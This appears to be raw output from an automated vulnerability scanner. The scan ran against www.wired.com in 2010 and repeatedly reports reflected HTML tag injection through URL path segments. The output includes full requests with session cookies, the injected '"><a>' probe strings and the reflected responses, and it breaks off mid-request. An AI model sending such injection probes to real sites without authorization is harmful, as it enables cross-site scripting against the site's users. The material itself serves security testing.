GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:40 GMT Date: Sun, 21 Nov 2010 23:06:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:04 GMT Date: Sun, 21 Nov 2010 23:07:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=224 Expires: Mon, 22 Nov 2010 01:13:02 GMT Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_customerservice839c3"><a>d95b402d7c8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainmenta7ac8"><a>98e7490e5ae"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Sun, 21 Nov 2010 20:16:27 GMT Date: Sun, 21 Nov 2010 20:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment5df5b"><a>b5f8392314c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:30 GMT Date: Sun, 21 Nov 2010 23:07:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=574
Expires: Sun, 21 Nov 2010 23:17:52 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:32 GMT
Date: Sun, 21 Nov 2010 23:07:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment224ea"><a>7c815694db5 ss_music">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:21 GMT
Date: Sun, 21 Nov 2010 23:07:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news70d39"><a>b304160c724">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:29 GMT
Date: Sun, 21 Nov 2010 23:07:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:08:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news794ab"><a>79fd2601542">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:12 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29337
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29331
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:33 GMT
Date: Mon, 22 Nov 2010 01:10:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets24f0b"><a>06f0bc5b429">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
